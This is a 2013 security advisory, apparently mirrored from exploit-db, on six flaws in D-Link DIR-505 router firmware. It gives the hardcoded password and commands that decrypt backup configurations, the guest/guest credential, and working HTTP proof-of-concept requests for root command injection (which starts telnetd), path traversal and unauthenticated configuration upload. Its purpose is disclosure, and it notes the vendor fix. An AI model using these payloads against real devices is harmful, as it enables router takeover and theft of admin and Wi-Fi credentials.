D-Link DIR-505 1.06 – Multiple Vulnerabilities

  • Author: Alessandro Di Pinto
    Date: 2013-09-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/28184/
    Multiple vulnerabilities on D-Link Dir-505 devices
    ==================================================
    
    [ADVISORY INFORMATION]
    Title:		Multiple vulnerabilities on D-Link Dir-505 devices
    Discovery date: 05/04/2013
    Release date: 	09/09/2013
    Credits: 	Alessandro Di Pinto (alessandro.dipinto () artificialstudios org)
    Twitter: 	@adipinto
    
    [AFFECTED PRODUCTS]
    This security vulnerability affects the following products and firmware
    versions:
    
    * D-Link DIR-505, firmware version <= 1.06
    
    Other products and firmware versions could also be vulnerable, but they were
    not checked.
    
    [VULNERABILITY DETAILS]
    
    1) Weak configuration file encryption
    The file provided to the end-user for making a backup copy of the device
    configuration is encrypted with a hardcoded password. The device firmware
    creates the configuration file in three specific steps, as shown below:
     - Collect the configuration data to back up
     - Encrypt the entries with the hardcoded password "sw5-superman"
     - Create the file header with the tool "imghdr"
    
    The file header has a fixed size of 84 bytes. An attacker able to obtain an
    encrypted configuration file could decrypt its contents with the following
    commands:
    
     sh# dd if=config-file of=config-file-no-header bs=84 skip=1
     sh# ccrypt -d -K sw5-superman config-file-no-header
    
    Decrypted file contains sensitive information that an attacker could use
    in order to compromise the target device (e.g., admin password and WPA
    passphrase).
    
    Furthermore, an attacker can craft their own configuration file, encrypt it
    with the hardcoded password, prepend a valid header and finally upload the new
    configuration to the target device without authentication, exploiting the
    "Authentication bypass" issue described in this advisory.
    
    
    2) Command Injection
    An authenticated attacker can exploit the "Ping Test" feature exposed on the
    page "/System_Check.htm" in order to execute arbitrary commands on the
    device with root privileges. More precisely, the "ip_addr" parameter is not
    sanitized properly, so traditional command injection techniques apply. This
    security issue is exploitable only after a successful authentication.
    
    Proof-of-Concept used to open telnet on vulnerable devices:
    
    """
    POST /my_cgi.cgi HTTP/1.1
    Host: [IP]
    Cookie: uid=[VALID-COOKIE-HERE]
    Content-Length: 55
    
    request=ping_test&ip_addr=127.0.0.1; /usr/sbin/telnetd;
    """
    
    3) Path traversal (directory listing)
    The web-gui exposed on port 8181/TCP is used to explore the contents of the
    USB drive connected to the device. Normally the end-user is allowed to list
    only the files inside their own USB drive but, due to insufficient security
    checks, an attacker is able to list the contents of any file system
    directory. Only authenticated users can exploit this issue.
    
    Proof-of-Concept used to list the device's /etc/ directory:
    
    http://192.168.0.1:8181/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
    
    
    4) Path traversal (file upload)
    The web-gui exposed on port 8181/TCP allows authorized users (e.g., the admin
    user) to upload files to the USB drive connected to the device. The upload
    feature is present at the following link:
    
    http://[IP]:8181/folder_view.htm
    
    The upload operation is performed through a POST request to the resource
    "/dws/api/UploadFile" using a "multipart/form-data" content-type. Several
    parameters are passed, but the "path" parameter can be abused to change the
    destination directory of the uploaded file. This issue allows an
    authenticated user to upload an arbitrary file anywhere on the target device.
    
    Proof-of-Concept used to upload a simple text file inside the /tmp/ directory:
    
    """
    POST /dws/api/UploadFile?0.35494315220771677 HTTP/1.1
    Host: [IP]:8181
    Cookie: uid=[VALID-COOKIE-HERE]
    Content-Type: multipart/form-data;
    	boundary=---------------------------736034324104825609817274318
    Content-Length: 1179
    
    -----------------------------736034324104825609817274318
    Content-Disposition: form-data; name="id"
    
    admin
    -----------------------------736034324104825609817274318
    Content-Disposition: form-data; name="tok"
    
    -----------------------------736034324104825609817274318
    Content-Disposition: form-data; name="volid"
    
    1
    -----------------------------736034324104825609817274318
    Content-Disposition: form-data; name="path"
    
    usb_dev/usb_A1/../../../../../../../../../tmp/
    -----------------------------736034324104825609817274318
    Content-Disposition: form-data; name="filename"
    
    exploit.txt
    -----------------------------736034324104825609817274318
    Content-Disposition: form-data; name="upload_file"; filename="test.txt"
    Content-Type: text/plain
    
    malicious text
    -----------------------------736034324104825609817274318--
    """
    
    
    5) Privilege escalation (hardcoded credential)
    The upload feature, described in issue 4 "Path traversal (file upload)", is
    theoretically designed to be used only by authorized users (selected through
    the web-gui). The device has the following hardcoded user, which cannot be
    deleted using the web-gui:
    
    username: guest
    password: guest
    
    Using this credential, the end-user can access the web-gui (exposed on port
    8181/TCP) in read-only mode; the button used to upload files is disabled in
    an attempt to deny unauthorized operations. However, due to incorrect session
    handling, an attacker can bypass this limitation with the following steps:
    - Login with the hardcoded user "guest" in order to get a valid cookie.
    - Using this cookie it is possible to make a direct upload request like the
    Proof-of-Concept described previously in the issue 4.
    
    The purpose of this exploit is to perform an arbitrary file upload using a
    hardcoded (read-only) user.
    
    
    6) Authentication bypass
    The "my_cgi.cgi" resource exposes several features accessible with no
    authentication. In particular, every request that specifies the HTTP header
    field "Content-type: multipart/form-data" is processed without performing any
    authentication check. An *unauthenticated* attacker can exploit this issue in
    order to upload a malicious configuration to the target device, overwriting the
    original configuration (e.g., setting a new admin password).
    
    Proof-of-Concept used to upload a configuration file without performing the login:
    
    """
    POST /my_cgi.cgi HTTP/1.1
    Host: [IP]
    Cookie: uid=[VALID-COOKIE-HERE]
    Content-Type: multipart/form-data;
    	boundary=---------------------------4318828241986447042487864450
    Content-Length: 382
    
    -----------------------------4318828241986447042487864450
    Content-Disposition: form-data; name="which_action"
    
    load_conf
    -----------------------------4318828241986447042487864450
    Content-Disposition: form-data; name="file"; filename="attacker-config.bin"
    Content-Type: text/plain
    
    [MALICIOUS-CONFIGURATION-HERE]
    -----------------------------4318828241986447042487864450--
    """
    
    [REMEDIATION]
    D-Link has released an updated firmware version (1.07) that addresses most of
    the described issues. Firmware is already available on D-Link web site, at the
    following URL:
    ftp://ftp.dlink.com/Gateway/dir505/Firmware/dir505_fw_107.zip
    
    [DISCLAIMER]
    The author is not responsible for the misuse of the information provided in
    this security advisory. The advisory is a service to the professional security
    community. There are NO WARRANTIES with regard to this information. Any
    application or distribution of this information constitutes acceptance AS IS,
    at the user's own risk. This information is subject to change without notice.